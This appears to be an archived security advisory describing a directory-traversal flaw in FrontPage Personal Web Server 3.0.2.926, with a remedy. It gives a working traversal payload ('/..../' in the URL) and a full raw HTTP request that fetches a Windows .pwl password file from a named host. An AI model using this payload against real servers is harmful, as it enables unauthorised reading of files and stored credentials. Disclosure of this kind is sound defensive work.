FrontPage Personal Web Server on Windows
Input validation error
Unauthorized file access
Packetstorm, Bugtraq
Description: Doubledot bug in FrontPage FrontPage Personal Web Server.
Compromise: Accessing drive through browser.
Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions not tested.
Details:
When FrontPage-PWS runs a site on your c:\ drive your drive could be = accessed by any user accessing your page, simply by requesting any file = in any directory except the files in the FrontPage dir. specially = /_vti_pvt/.
How to exploit this bug?
Simply adding /..../ in the URL addressbar.
http://www.target.com/..../
so by requesting http://www.target.com/..../Windows/Admin.pwl the =
webserver let us download the .pwl file from the target.
Files and dirs. with the hidden attribute set are vulnerable.
Solution:
The best solution is installing FrontPage on a drive that doesn't =
contain Private information.
Greetings,
Jan van de Rijt aka The Warlock.
Attack string
GET /..../Windows/Admin.pwl HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (compatible; Konqueror/3.2; Linux) (KHTML, like Gecko) Accept: text/html, image/jpeg, image/png, text/*, image/*, */* Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5 Accept-Language: en Host: www.i-pi.com